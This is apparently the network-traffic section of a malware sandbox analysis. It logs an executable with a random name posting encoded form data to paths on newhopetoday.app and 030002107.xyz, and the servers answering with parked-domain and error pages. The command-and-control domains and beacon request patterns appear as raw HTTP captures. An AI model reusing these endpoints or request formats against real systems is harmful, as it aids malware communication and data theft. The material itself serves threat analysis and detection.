Nov 2, 2024 05:26:02.603455067 CET	1236	IN	Data Raw: 66 72 61 6d 65 73 0a 20 20 20 20 66 6f 72 20 28 76 61 72 20 69 20 3d 20 30 3b 20 69 20 3c 20 74 72 61 63 65 46 72 61 6d 65 73 2e 6c 65 6e 67 74 68 3b 20 69 2b 2b 29 20 7b 0a 20 20 20 20 20 20 74 72 61 63 65 46 72 61 6d 65 73 5b 69 5d 2e 61 64 64 Data Ascii: frames for (var i = 0; i < traceFrames.length; i++) { traceFrames[i].addEventListener('click', function(e) { e.preventDefault(); var target = e.target; var frame_id = target.dataset.frameId; if (selec
Nov 2, 2024 05:26:02.608310938 CET	1236	IN	Data Raw: 74 68 20 28 77 69 74 68 6f 75 74 20 74 68 65 20 68 74 74 70 20 6f 72 20 64 6f 6d 61 69 6e 29 22 20 68 72 65 66 3d 22 23 22 3e 50 61 74 68 3c 2f 61 3e 20 2f 0a 20 20 20 20 20 20 20 20 3c 61 20 64 61 74 61 2d 72 6f 75 74 65 2d 68 65 6c 70 65 72 3d Data Ascii: th (without the http or domain)" href="#">Path</a> / <a data-route-helper="_url" title="Returns an absolute URL (with the http and domain)" href="#">Url</a> </th> <th> </th> <th> <input id="search" place

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49789	216.40.34.41	80	2124	C:\Program Files (x86)\RhRPFOawgYIJSnKXgsutmvHcAurWCAYfPzdwFoYOBJtkTzVXg\wioTZtEQwu.exe

Timestamp	Bytes transferred	Direction	Data
Nov 2, 2024 05:26:04.462033033 CET	10800	OUT	POST /qbij/ HTTP/1.1 Host: www.newhopetoday.app Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate Content-Length: 10305 Connection: close Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Origin: http://www.newhopetoday.app Referer: http://www.newhopetoday.app/qbij/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:20.0) Gecko/20100101 Firefox/40.0 Data Raw: 4f 72 73 4c 62 66 53 38 3d 36 77 70 52 6f 38 75 4d 50 4d 4c 50 72 30 66 2b 61 34 5a 6c 51 66 64 54 79 69 34 46 6b 71 41 4e 31 65 32 39 48 38 55 6f 30 4e 64 6a 4c 49 4d 4e 66 46 4e 45 75 70 46 33 30 63 67 43 49 39 72 54 46 77 4e 4a 45 6f 6c 2b 48 30 41 45 53 6e 44 46 4e 5a 4b 51 64 34 44 6d 43 58 67 52 51 57 6f 36 72 37 42 39 4d 7a 62 54 71 63 61 77 2f 37 6c 59 48 51 52 77 61 66 45 72 35 2b 65 57 45 59 64 55 57 68 48 31 2b 55 6a 51 4f 61 73 52 74 36 4b 46 6c 78 6e 4d 73 4d 77 73 6f 67 76 4a 6e 4b 69 46 77 6d 65 6f 42 74 55 66 55 30 54 49 53 48 69 30 4c 54 38 38 49 45 4c 31 4e 30 78 5a 79 4d 49 67 38 63 61 52 4a 5a 71 66 5a 55 35 52 41 2f 6c 43 63 73 70 47 70 78 46 55 7a 49 67 62 65 64 41 58 76 6e 6a 74 4a 62 2f 63 72 36 46 43 6c 4e 67 42 58 6d 78 2f 68 2f 2b 52 67 78 4a 34 51 50 6f 6b 6b 59 30 2b 54 4a 69 6c 76 33 54 4a 4b 72 6e 37 51 57 68 7a 73 33 30 59 36 65 74 70 5a 56 66 55 76 77 43 6e 62 7a 76 47 38 4a 37 44 6a 68 68 36 4d 52 61 2b 30 78 4d 6a 35 4d 62 50 76 36 69 52 72 76 35 74 4a 63 77 49 50 [TRUNCATED] Data Ascii: OrsLbfS8=6wpRo8uMPMLPr0f+a4ZlQfdTyi4FkqAN1e29H8Uo0NdjLIMNfFNEupF30cgCI9rTFwNJEol+H0AESnDFNZKQd4DmCXgRQWo6r7B9MzbTqcaw/7lYHQRwafEr5+eWEYdUWhH1+UjQOasRt6KFlxnMsMwsogvJnKiFwmeoBtUfU0TISHi0LT88IEL1N0xZyMIg8caRJZqfZU5RA/lCcspGpxFUzIgbedAXvnjtJb/cr6FClNgBXmx/h/+RgxJ4QPokkY0+TJilv3TJKrn7QWhzs30Y6etpZVfUvwCnbzvG8J7Djhh6MRa+0xMj5MbPv6iRrv5tJcwIPKpMV+19K9ZBi5m4Sba5G2Qqfc4rm4S8wsAU+FsyMjuZyzuTAjB+qISnl+NrSro6JpsDTqdefcohzH+fHrWxmIcjW64OCbTvpfN6l7OlIE1BED0DLGxlshM29KQE9XQbBCJaNMhTdYhfx1LcvD4F5eo66QEwCRSNMveeKDSM/oLKCl1tDg+KmuF8/9rjoC19xZ54dlWJOIJc91RJ0DIyBn5T0fsFyHJKVjqsHGyMyrZAUjFVaUIqWgXSwnyOenJ297XsxzDxTWc7eDFBPNblYpF5gptSm0sg6u6yZIWhZm0vkvD2xPdnmXhn5pz2DSzugSGzvCuqPTEQTTqgagJujHvIrTsjmNHZwBU1ReECQqE/u7Dzw2px4fXqCcDsZstCwM6mTl8BxV/v6OKTNeMvR8KeqfDXR8qDKoJVyRXcrYhaNP0thFMXqgN/ZghBomtXDhV+WOSlOT5NO8osa7J0s+n4vZeYeZEPPbPuPXqiOv6oqoyHfXJ+5tCvo1SZx6v8RHcsxSnrJdankm79DBfd+bv7xniar2uGO01A5GK1pMrmOWHN9ixsovaIl3riiOnCaO41duUTVyQm6c+Doh/RBBF9+YGAU1PaTkoi2EmaO4XNIInLEZsCdNah5hw7fCyAu8Gji09DYAoIVmgpZAmG4VFrxoghs9QyjkF [TRUNCATED]
Nov 2, 2024 05:26:05.190457106 CET	1236	IN	HTTP/1.1 404 Not Found content-type: text/html; charset=UTF-8 x-request-id: 621ce876-cdc8-4a73-97dc-a3df84f66997 x-runtime: 0.022279 content-length: 27204 connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 3c 74 69 74 6c 65 3e 41 63 74 69 6f 6e 20 43 6f 6e 74 72 6f 6c 6c 65 72 3a 20 45 78 63 65 70 74 69 6f 6e 20 63 61 75 67 68 74 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 46 41 46 41 46 41 3b 0a 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 33 33 3b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 62 6f 64 79 2c 20 70 2c 20 6f 6c 2c 20 75 6c 2c 20 74 64 20 7b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 68 65 6c 76 65 74 69 63 61 2c 20 76 65 72 64 61 6e 61 2c 20 61 72 69 61 6c 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 20 20 31 33 70 78 3b 0a 20 20 20 20 20 20 6c 69 6e 65 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8" /> <title>Action Controller: Exception caught</title> <style> body { background-color: #FAFAFA; color: #333; margin: 0px; } body, p, ol, ul, td { font-family: helvetica, verdana, arial, sans-serif; font-size: 13px; line-height: 18px; } pre { font-size: 11px; white-space: pre-wrap; } pre.box { border: 1px solid #EEE; padding: 10px; margin: 0px; width: 958px; } header { color: #F0F0F0; background: #C52F24; padding: 0.5em 1.5em; } h1 { margin: 0.2em 0; line-height: 1.1em; font-size: 2em; } h2 { color: #C52F24; line-height: 25px; } .details { border: 1px solid #D0D0D0; border-radius: 4px; margin: 1em 0px; display: block; width: 978px; } .summary { padding: 8px 15px; border-bottom: 1px solid #D0D0D0; [TRUNCATED]
Nov 2, 2024 05:26:05.190469027 CET	212	IN	Data Raw: 70 72 65 20 7b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 35 70 78 3b 0a 20 20 20 20 20 20 62 6f 72 64 65 72 3a 20 6e 6f 6e 65 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 23 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 62 6f 78 2d 73 69 7a Data Ascii: pre { margin: 5px; border: none; } #container { box-sizing: border-box; width: 100%; padding: 0 1.5em; } .source * { margin: 0px; padding: 0px; }
Nov 2, 2024 05:26:05.190479040 CET	1236	IN	Data Raw: 20 20 20 2e 73 6f 75 72 63 65 20 7b 0a 20 20 20 20 20 20 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 44 39 44 39 44 39 3b 0a 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 45 43 45 43 45 43 3b 0a 20 20 20 20 20 20 77 69 64 Data Ascii: .source { border: 1px solid #D9D9D9; background: #ECECEC; width: 978px; } .source pre { padding: 10px 0px; border: none; } .source .data { font-size: 80%; overflow: auto; bac
Nov 2, 2024 05:26:05.190524101 CET	1236	IN	Data Raw: 69 74 2d 61 70 70 65 61 72 61 6e 63 65 3a 20 74 65 78 74 66 69 65 6c 64 3b 0a 20 20 7d 0a 0a 20 20 23 72 6f 75 74 65 5f 74 61 62 6c 65 20 74 62 6f 64 79 20 74 72 20 7b 0a 20 20 20 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 31 70 78 20 73 6f Data Ascii: it-appearance: textfield; } #route_table tbody tr { border-bottom: 1px solid #ddd; } #route_table tbody tr:nth-child(odd) { background: #f2f2f2; } #route_table tbody.exact_matches, #route_table tbody.fuzzy_matches {
Nov 2, 2024 05:26:05.190536022 CET	1236	IN	Data Raw: 45 72 72 6f 72 3c 2f 68 31 3e 0a 3c 2f 68 65 61 64 65 72 3e 0a 3c 64 69 76 20 69 64 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 20 20 3c 68 32 3e 4e 6f 20 72 6f 75 74 65 20 6d 61 74 63 68 65 73 20 5b 50 4f 53 54 5d 20 26 71 75 6f 74 3b 2f 71 62 69 Data Ascii: Error</h1></header><div id="container"> <h2>No route matches [POST] "/qbij"</h2> <p><code>Rails.root: /hover-parked</code></p><div id="traces"> <a href="#" onclick="hide('Framework-Trace');hide('Full-Trace&#
Nov 2, 2024 05:26:05.190547943 CET	636	IN	Data Raw: 61 63 65 2d 66 72 61 6d 65 73 22 20 64 61 74 61 2d 66 72 61 6d 65 2d 69 64 3d 22 33 22 20 68 72 65 66 3d 22 23 22 3e 72 61 69 6c 74 69 65 73 20 28 35 2e 32 2e 36 29 20 6c 69 62 2f 72 61 69 6c 73 2f 72 61 63 6b 2f 6c 6f 67 67 65 72 2e 72 62 3a 32 Data Ascii: ace-frames" data-frame-id="3" href="#">railties (5.2.6) lib/rails/rack/logger.rb:28:in `call'</a><br><a class="trace-frames" data-frame-id="4" href="#">actionpack (5.2.6) lib/action_dispatch/middleware/remote_ip.rb:81:in `call'</a><br>
Nov 2, 2024 05:26:05.190558910 CET	1236	IN	Data Raw: 22 74 72 61 63 65 2d 66 72 61 6d 65 73 22 20 64 61 74 61 2d 66 72 61 6d 65 2d 69 64 3d 22 38 22 20 68 72 65 66 3d 22 23 22 3e 72 61 63 6b 20 28 32 2e 32 2e 33 29 20 6c 69 62 2f 72 61 63 6b 2f 72 75 6e 74 69 6d 65 2e 72 62 3a 32 32 3a 69 6e 20 60 Data Ascii: "trace-frames" data-frame-id="8" href="#">rack (2.2.3) lib/rack/runtime.rb:22:in `call'</a><br><a class="trace-frames" data-frame-id="9" href="#">activesupport (5.2.6) lib/active_support/cache/strategy/local_cache_middleware.rb:29:in `call
Nov 2, 2024 05:26:05.190570116 CET	1236	IN	Data Raw: 22 74 72 61 63 65 2d 66 72 61 6d 65 73 22 20 64 61 74 61 2d 66 72 61 6d 65 2d 69 64 3d 22 31 38 22 20 68 72 65 66 3d 22 23 22 3e 70 75 6d 61 20 28 34 2e 33 2e 39 29 20 6c 69 62 2f 70 75 6d 61 2f 74 68 72 65 61 64 5f 70 6f 6f 6c 2e 72 62 3a 31 33 Data Ascii: "trace-frames" data-frame-id="18" href="#">puma (4.3.9) lib/puma/thread_pool.rb:134:in `block in spawn_thread'</a><br></code></pre> </div> <div id="Full-Trace" style="display: none;"> <pre><code><a class="trace-frames" data-f
Nov 2, 2024 05:26:05.190579891 CET	1236	IN	Data Raw: 64 5f 6f 76 65 72 72 69 64 65 2e 72 62 3a 32 34 3a 69 6e 20 60 63 61 6c 6c 26 23 33 39 3b 3c 2f 61 3e 3c 62 72 3e 3c 61 20 63 6c 61 73 73 3d 22 74 72 61 63 65 2d 66 72 61 6d 65 73 22 20 64 61 74 61 2d 66 72 61 6d 65 2d 69 64 3d 22 38 22 20 68 72 Data Ascii: d_override.rb:24:in `call'</a><br><a class="trace-frames" data-frame-id="8" href="#">rack (2.2.3) lib/rack/runtime.rb:22:in `call'</a><br><a class="trace-frames" data-frame-id="9" href="#">activesupport (5.2.6) lib/active_support/cache
Nov 2, 2024 05:26:05.190592051 CET	636	IN	Data Raw: 72 2e 72 62 3a 33 32 38 3a 69 6e 20 60 62 6c 6f 63 6b 20 69 6e 20 72 75 6e 26 23 33 39 3b 3c 2f 61 3e 3c 62 72 3e 3c 61 20 63 6c 61 73 73 3d 22 74 72 61 63 65 2d 66 72 61 6d 65 73 22 20 64 61 74 61 2d 66 72 61 6d 65 2d 69 64 3d 22 31 38 22 20 68 Data Ascii: r.rb:328:in `block in run'</a><br><a class="trace-frames" data-frame-id="18" href="#">puma (4.3.9) lib/puma/thread_pool.rb:134:in `block in spawn_thread'</a><br></code></pre> </div> <script type="text/javascript"> var traceF
Nov 2, 2024 05:26:05.195350885 CET	1236	IN	Data Raw: 73 65 74 2e 66 72 61 6d 65 49 64 3b 0a 0a 20 20 20 20 20 20 20 20 69 66 20 28 73 65 6c 65 63 74 65 64 46 72 61 6d 65 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 73 65 6c 65 63 74 65 64 46 72 61 6d 65 2e 63 6c 61 73 73 4e 61 6d 65 20 3d 20 73 65 6c Data Ascii: set.frameId; if (selectedFrame) { selectedFrame.className = selectedFrame.className.replace("selected", ""); } target.className += " selected"; selectedFrame = target; // Change the extracte

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49802	216.40.34.41	80	2124	C:\Program Files (x86)\RhRPFOawgYIJSnKXgsutmvHcAurWCAYfPzdwFoYOBJtkTzVXg\wioTZtEQwu.exe

Timestamp	Bytes transferred	Direction	Data
Nov 2, 2024 05:26:07.058512926 CET	437	OUT	GET /qbij/?OrsLbfS8=3yBxrJasAuf5uA+hQoF/UdNjpA1mjOQppauFPNhs8egGU99AKUFjj/YAtZh8NtvRPm16ZOtyDlQ/WV2EVpC6JJKWKngbR0sBrYN3Ow3Fjb2T/aVlNEtrO8A=&5Js0X=9zex_vxPfbpDzDPp HTTP/1.1 Host: www.newhopetoday.app Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.9 Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:20.0) Gecko/20100101 Firefox/40.0
Nov 2, 2024 05:26:07.731293917 CET	1236	IN	HTTP/1.1 200 OK x-frame-options: SAMEORIGIN x-xss-protection: 1; mode=block x-content-type-options: nosniff x-download-options: noopen x-permitted-cross-domain-policies: none referrer-policy: strict-origin-when-cross-origin content-type: text/html; charset=utf-8 etag: W/"489b1cc03742192cd82a546616d2ba37" cache-control: max-age=0, private, must-revalidate x-request-id: ba5f7d41-c395-4c22-ad21-33ec1ea39d40 x-runtime: 0.006845 transfer-encoding: chunked connection: close Data Raw: 31 34 42 31 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 27 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 27 20 68 74 74 70 2d 65 71 75 69 76 3d 27 43 6f 6e 74 65 6e 74 2d 54 79 70 65 27 3e 0a 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 27 33 43 62 61 56 76 77 2d 49 37 4d 6c 72 6d 6d 6d 48 7a 30 62 66 62 6b 6f 37 6f 4d 43 57 31 6d 6e 32 75 36 35 75 57 73 57 57 42 38 27 20 6e 61 6d 65 3d 27 67 6f 6f 67 6c 65 2d 73 69 74 65 2d 76 65 72 69 66 69 63 61 74 69 6f 6e 27 3e 0a 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 27 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 27 20 6e 61 6d 65 3d 27 76 69 65 77 70 6f 72 74 27 3e 0a 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 27 74 65 6c 65 70 68 6f 6e 65 3d 6e 6f 27 20 6e 61 6d 65 3d 27 66 6f 72 6d 61 74 2d 64 65 74 65 63 74 69 6f 6e 27 3e 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 27 64 61 74 61 [TRUNCATED] Data Ascii: 14B1<!DOCTYPE html><html><head><meta content='text/html; charset=UTF-8' http-equiv='Content-Type'><meta content='3CbaVvw-I7MlrmmmHz0bfbko7oMCW1mn2u65uWsWWB8' name='google-site-verification'><meta content='width=device-width, initial-scale=1.0' name='viewport'><meta content='telephone=no' name='format-detection'><link href='data:;base64,iVBORw0KGgo=' rel='icon'><title>newhopetoday.app is coming soon</title><link rel="stylesheet" media="screen" href="https://fonts.googleapis.com/css?family=Open+Sans:300,400,600,700" /><link rel="stylesheet" media="all" href="/assets/application-2f7e7f30d812d0f3950918c7562df7e68eeeebd8649bdea2bc3844eb07fc8269.css" /></head><body><header><a rel="nofollow" href="https://www.hover.com/?source=p
Nov 2, 2024 05:26:07.731309891 CET	1236	IN	Data Raw: 61 72 6b 65 64 22 3e 3c 69 6d 67 20 77 69 64 74 68 3d 22 31 30 32 22 20 68 65 69 67 68 74 3d 22 33 30 22 20 73 72 63 3d 22 2f 61 73 73 65 74 73 2f 68 76 5f 6c 6f 67 6f 5f 72 65 74 69 6e 61 2d 36 61 32 62 61 38 33 35 30 39 30 37 64 34 61 31 37 62 Data Ascii: arked"><img width="102" height="30" src="/assets/hv_logo_retina-6a2ba8350907d4a17bfc7863c2f1378e38a53bd22b790c69c14143b0f9ce45ca.png" /></a></header><main><h1>newhopetoday.app</h1><h2>is a totally awesome idea still being worked on.</h2><
Nov 2, 2024 05:26:07.731340885 CET	424	IN	Data Raw: 20 72 65 6c 3d 22 6e 6f 66 6f 6c 6c 6f 77 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 68 6f 76 65 72 2e 63 6f 6d 2f 61 62 6f 75 74 3f 73 6f 75 72 63 65 3d 70 61 72 6b 65 64 22 3e 41 62 6f 75 74 20 55 73 3c 2f 61 3e 3c 2f 6c 69 3e Data Ascii: rel="nofollow" href="https://www.hover.com/about?source=parked">About Us</a></li><li><a rel="nofollow" href="https://help.hover.com/home?source=parked">Help</a></li><li><a rel="nofollow" href="https://www.hover.com/tools?source=parked">Your
Nov 2, 2024 05:26:07.731352091 CET	1236	IN	Data Raw: 69 72 63 6c 65 20 63 78 3d 22 35 30 22 20 63 79 3d 22 35 30 22 20 72 3d 22 35 30 22 20 2f 3e 3c 67 20 74 72 61 6e 73 66 6f 72 6d 3d 22 73 63 61 6c 65 28 30 2e 32 35 20 30 2e 32 35 29 20 74 72 61 6e 73 6c 61 74 65 28 33 30 20 35 30 29 22 3e 3c 70 Data Ascii: ircle cx="50" cy="50" r="50" /><g transform="scale(0.25 0.25) translate(30 50)"><path d="M182.409,262.307v-99.803h33.499l5.016-38.895h-38.515V98.777c0-11.261,3.127-18.935,19.275-18.935 l20.596-0.009V45.045c-3.562-0.474-15.788-1.533-30.012-1.53
Nov 2, 2024 05:26:07.731358051 CET	1236	IN	Data Raw: 38 39 2c 31 2e 32 33 33 39 38 20 2d 32 2e 32 36 37 33 2c 30 20 2d 34 2e 34 37 31 31 34 2c 2d 30 2e 32 32 31 32 34 20 2d 36 2e 36 32 30 31 31 2c 2d 30 2e 36 33 31 31 34 20 34 2e 34 37 38 30 31 2c 31 33 2e 39 37 38 35 37 20 31 37 2e 34 37 32 31 34 Data Ascii: 89,1.23398 -2.2673,0 -4.47114,-0.22124 -6.62011,-0.63114 4.47801,13.97857 17.47214,24.15143 32.86992,24.43441 -12.04227,9.43796 -27.21366,15.06335 -43.69965,15.06335 -2.84014,0 -5.64082,-0.16722 -8.39349,-0.49223 15.57186,9.98421 34.06703,15.8
Nov 2, 2024 05:26:07.731365919 CET	424	IN	Data Raw: 31 20 32 39 20 31 38 2e 35 20 37 31 2e 35 74 31 30 20 31 30 33 74 33 20 39 36 2e 35 74 30 20 31 30 35 2e 35 74 2d 30 2e 35 20 37 36 2e 35 74 30 2e 35 20 37 36 2e 35 74 30 20 31 30 35 2e 35 74 2d 33 20 39 36 2e 35 74 2d 31 30 20 31 30 33 74 2d 31 Data Ascii: 1 29 18.5 71.5t10 103t3 96.5t0 105.5t-0.5 76.5t0.5 76.5t0 105.5t-3 96.5t-10 103t-18.5 71.5q-20 50 -58 88t-88 58q-29 11 -71.5 18.5t-103 10t-96.5 3t-105.5 0t-76.5 -0.5zM1536 640q0 -229 -5 -317 q-10 -208 -124 -322t-322 -124q-88 -5 -317 -5t-317 5q
Nov 2, 2024 05:26:07.731375933 CET	694	IN	Data Raw: 0d 0a 32 41 38 0d 0a 61 76 3e 0a 3c 75 6c 3e 0a 3c 6c 69 3e 43 6f 70 79 72 69 67 68 74 20 26 63 6f 70 79 3b 20 32 30 32 34 20 48 6f 76 65 72 3c 2f 6c 69 3e 0a 3c 6c 69 3e 3c 61 20 72 65 6c 3d 22 6e 6f 66 6f 6c 6c 6f 77 22 20 68 72 65 66 3d 22 68 Data Ascii: 2A8av><ul><li>Copyright © 2024 Hover</li><li><a rel="nofollow" href="https://www.hover.com/tos?source=parked">Terms of Service</a></li><li><a rel="nofollow" href="https://www.hover.com/privacy?source=parked">Privacy</a></li></ul>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	49836	161.97.142.144	80	2124	C:\Program Files (x86)\RhRPFOawgYIJSnKXgsutmvHcAurWCAYfPzdwFoYOBJtkTzVXg\wioTZtEQwu.exe

Timestamp	Bytes transferred	Direction	Data
Nov 2, 2024 05:26:12.844213963 CET	689	OUT	POST /e8he/ HTTP/1.1 Host: www.030002107.xyz Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate Content-Length: 205 Connection: close Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Origin: http://www.030002107.xyz Referer: http://www.030002107.xyz/e8he/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:20.0) Gecko/20100101 Firefox/40.0 Data Raw: 4f 72 73 4c 62 66 53 38 3d 72 65 75 47 74 38 42 46 5a 69 36 5a 31 42 47 38 35 79 33 51 2b 56 64 6e 63 44 47 36 6f 38 56 5a 34 4d 69 37 79 37 59 75 46 43 77 43 78 43 53 67 54 77 53 2b 4b 48 4d 30 42 32 53 4d 71 64 56 6c 41 67 37 54 77 79 64 56 31 62 32 64 53 6d 35 69 48 77 63 51 73 74 4c 78 4f 73 72 79 2b 45 71 77 6c 6e 36 58 6e 6d 52 62 58 52 56 2f 64 56 6c 51 38 59 36 35 42 36 34 4b 4a 31 61 74 64 2b 33 4a 66 41 7a 6c 36 70 6a 48 67 61 69 43 68 57 59 34 57 4a 6b 6b 4d 51 4d 68 5a 7a 61 6a 4b 57 73 61 72 53 69 6f 53 35 52 62 63 63 54 39 7a 4c 63 4c 34 4b 49 79 59 36 50 71 41 59 4e 7a 4b 56 4e 46 4b 67 3d 3d Data Ascii: OrsLbfS8=reuGt8BFZi6Z1BG85y3Q+VdncDG6o8VZ4Mi7y7YuFCwCxCSgTwS+KHM0B2SMqdVlAg7TwydV1b2dSm5iHwcQstLxOsry+Eqwln6XnmRbXRV/dVlQ8Y65B64KJ1atd+3JfAzl6pjHgaiChWY4WJkkMQMhZzajKWsarSioS5RbccT9zLcL4KIyY6PqAYNzKVNFKg==
Nov 2, 2024 05:26:13.697709084 CET	1236	IN	HTTP/1.1 404 Not Found Server: nginx Date: Sat, 02 Nov 2024 04:26:13 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding ETag: W/"66cce1df-b96" Content-Encoding: gzip Data Raw: 35 34 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8d 56 59 8f db 36 10 7e 76 7e 05 a3 22 48 0b 2c 69 1e a2 0e c7 5e 34 d9 26 68 1e 72 a0 db a2 e8 53 c0 95 28 4b 5d 59 74 24 da 5e a7 c8 7f ef 50 d7 ca 76 82 16 ba c8 99 f9 e6 e2 70 a8 e5 d3 5f 3e dc fc fe d7 c7 d7 28 b7 9b f2 fa c9 d2 7d 50 a9 aa f5 ca d3 95 77 fd 64 b6 cc b5 4a e1 3b 5b 6e b4 55 28 c9 55 dd 68 bb f2 76 36 c3 91 87 e6 8f ac 4a 6d f4 ca db 17 fa b0 35 b5 f5 50 62 2a ab 2b 10 3d 14 a9 cd 57 a9 de 17 89 c6 ed e4 0a 15 55 61 0b 55 e2 26 51 a5 5e b1 41 91 2d 6c a9 af 3f aa b5 46 ef 8d 45 6f cc ae 4a 97 f3 8e ea f8 8d 3d 76 a3 d9 9d 49 8f e8 1f 37 9a dd a9 e4 7e 5d 3b 51 9c 98 d2 d4 0b f4 43 26 dd f5 a2 65 6f 54 bd 2e 2a 6c cd 76 81 a2 67 1d 6d 90 93 a9 bb 3a 5a 06 fe e2 4c 6d 8a f2 b8 40 58 6d b7 a5 c6 cd b1 b1 7a 73 85 5e 95 45 75 ff 4e 25 b7 ed fc 0d 48 5e 21 ef 56 af 8d 46 7f bc f5 ae d0 6f e6 ce 58 03 b4 5f 75 b9 d7 b6 48 14 7a af 77 1a 38 2f 6b 08 f3 aa 35 30 f3 20 26 83 6e 55 d5 00 a3 81 0f 6e 74 5d 64 00 7b e9 ac a1 1b e7 15 7a bd 31 7f [TRUNCATED] Data Ascii: 54eVY6~v~"H,i^4&hrS(K]Yt$^Pvp_>(}PwdJ;[nU(Uhv6Jm5Pb+=WUaU&Q^A-l?FEoJ=vI7~];QC&eoT.lvgm:ZLm@Xmzs^EuN%H^!VFoX_uHzw8/k50 &nUnt]d{z1D7()St7JawG.z\|Q&8UjXB]O;g}\|5@Ro&i<b)~KmA5n)55AZ,/svWrt1J;^lJ(?}in`yqB 3ZcNqE^x$W,zkS3'xPuKt$:!f$iUw?:!arVF&P&mFWgC!;cC;xpUafKpZXzUR1k.1Z`?cVC4l- v\^x<XTM=z#zBqg[e_Ynwv2?tf.)x rkp8 ^9tGIw2+"$/V\|NRkPqcq?mDEN&BFtKGQ/xI %iO\|CqCJAtV"\|"@(3'!A>0HpL(pHP8G,$Qc
Nov 2, 2024 05:26:13.697984934 CET	370	IN	Data Raw: ee 1c 82 a8 28 61 4c 60 21 49 08 3e c9 90 08 3a ce 38 25 3e 8f 21 99 be 04 2b a0 46 10 06 01 f5 33 e1 dc 8e 80 cb 7c 12 87 01 06 8b 22 10 2e 9a 20 08 31 70 a5 f0 91 10 8e 77 c3 fd 10 6c 43 2e 44 44 a4 fb b2 00 b2 05 38 9f 75 e3 38 d8 fb b0 02 e0 Data Ascii: (aL`!I>:8%>!+F3\|". 1pwlC.DD8u8'/]tt0{{"G8A~[F`\075"J0B,FM@y#zJaac8;)76EO=m?5L

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	49852	161.97.142.144	80	2124	C:\Program Files (x86)\RhRPFOawgYIJSnKXgsutmvHcAurWCAYfPzdwFoYOBJtkTzVXg\wioTZtEQwu.exe

Timestamp	Bytes transferred	Direction	Data
Nov 2, 2024 05:26:15.382471085 CET	709	OUT	POST /e8he/ HTTP/1.1 Host: www.030002107.xyz Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate Content-Length: 225 Connection: close Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Origin: http://www.030002107.xyz Referer: http://www.030002107.xyz/e8he/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:20.0) Gecko/20100101 Firefox/40.0 Data Raw: 4f 72 73 4c 62 66 53 38 3d 72 65 75 47 74 38 42 46 5a 69 36 5a 30 67 57 38 31 78 66 51 34 31 64 6f 42 7a 47 36 69 63 56 64 34 4d 2b 37 79 36 4e 31 46 78 55 43 78 6e 75 67 51 79 36 2b 4c 48 4d 30 4b 57 53 4e 33 74 56 55 41 67 6e 45 77 77 5a 56 31 62 79 64 53 6b 68 69 45 44 30 58 74 39 4c 76 58 38 72 77 6a 30 71 77 6c 6e 36 58 6e 6e 77 47 58 52 39 2f 63 6c 31 51 39 39 57 36 66 71 34 